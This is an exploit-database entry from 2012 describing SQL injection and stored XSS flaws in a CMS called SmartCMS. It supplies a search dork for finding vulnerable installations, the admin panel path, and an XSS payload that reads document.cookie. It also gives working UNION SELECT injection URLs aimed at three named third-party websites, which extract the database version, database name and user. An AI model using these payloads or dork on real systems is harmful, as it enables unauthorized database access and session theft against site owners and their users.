SmartCMS SQL Injection / XSS Vulnerabilities

2012-07-24T00:00:00
ID 1337DAY-ID-19051
Type zdt
Reporter mix0x0
Modified 2012-07-24T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                                                      _                      _  _                       _  _        
                         (_)                  _ (_)(_) _                 _ (_)(_) _    
         _  _   _  _   _  _     _         _  (_)      (_)  _         _  (_)      (_)    
        (_)(_)_(_)(_) (_)(_)   (_) _   _ (_)(_)        (_)(_) _   _ (_)(_)        (_)  
       (_)   (_)   (_)   (_)      (_)_(_)   (_)    0   (_)   (_)_(_)   (_)    O   (_)  
       (_)   (_)   (_)   (_)       _(_)_    (_)        (_)    _(_)_    (_)        (_)  
       (_)   (_)   (_) _ (_) _  _ (_) (_) _  (_) _  _ (_)  _ (_) (_) _  (_) _  _ (_)    
       (_)   (_)   (_)(_)(_)(_)(_)       (_)    (_)(_)    (_)       (_)    (_)(_)      
                                                                                       
    -----------------------------------------------------------------------------------
    #
    # Exploit Title: SmartCMS - Multiple Vulnerabilities
    # Date: 22.07.12
    # Auth0r: mix0x0
    # Vendor or Software Link: n/a
    # Version: n/a
    # D0rk: inurl:program/friends.php
    # Admin-panel: /admin/index.php
    #
    ------------------------------------------------------------------------------------
    #
    # Type: SQL-Injection
    # Vulnerability:
            http://www.site.com/program/link.php?act=list&id=[SQLi]
    #
    ------------------------------------------------------------------------------------
    #
    # Type: XSS-Active
    # url: http://www.site.com/program/register.php
    # Field: "User name", "Reporter name".
    # Exploit: "><script>alert(document.cookie)</script>
    #
##########################################################################
## SQL Injection PoC:
## http://www.example.com/index.php?menuitem=29+AND+1=2+UNION+ALL+SELECT+version()--
## Cross Site Scripting PoC:
## http://www.example.comindex.php?menuitem=26&domeinvraag=<script>alert(1);</script>&aktie=Zoek&idx=23
##########################################################################
    
------------------------------------------------------------------------------------
     
    demo:
    http://www.offshorebankingregistry.com/program/link.php?act=list&id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--+m
    http://www.budgetairlineregistry.com/program/link.php?act=list&id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+m
    http://www.passportandvisaservicesregistry.com/program/article.php?act=info&id=-16+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14--+m



#  0day.today [2018-01-10]  #